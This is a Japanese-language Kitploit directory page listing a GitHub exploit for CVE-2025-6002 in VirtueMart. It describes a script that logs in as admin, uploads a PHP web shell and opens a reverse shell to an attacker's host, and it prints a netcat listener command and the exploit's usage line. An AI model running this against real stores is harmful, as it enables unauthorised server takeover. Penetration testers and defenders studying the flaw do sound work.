Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-6002 | Kitploit
ツール/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテスト
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-6002 のエクスプロイト

このスクリプトは、VirtueMart < 4.4.10 (CVE-2025-6002) の認証済み任意ファイルアップロードの脆弱性を悪用します。この脆弱性は、次のブログ記事で説明されています: https://blog.blacklanternsecurity.com/p/doomla-zero-days

このスクリプトは、指定された認証情報で VirtueMart にログインし、新しい製品を作成して、PHP Web シェルをメディアファイルとしてアップロードします。その後、指定された IP/ポートへのリバースシェルを起動します。

パラメータ:

  • --url: VirtueMart の URL
  • --username: 管理者ユーザー名
  • --password: 管理者パスワード
  • --remote-ip: 攻撃者の IP アドレスhttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: 攻撃者のポート

使用方法:

  1. 攻撃マシンで Netcat を実行します:
root@kitploit:~
nc -nlvp 1337
  1. エクスプロイトを実行します
root@kitploit:~
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
ツールをダウンロード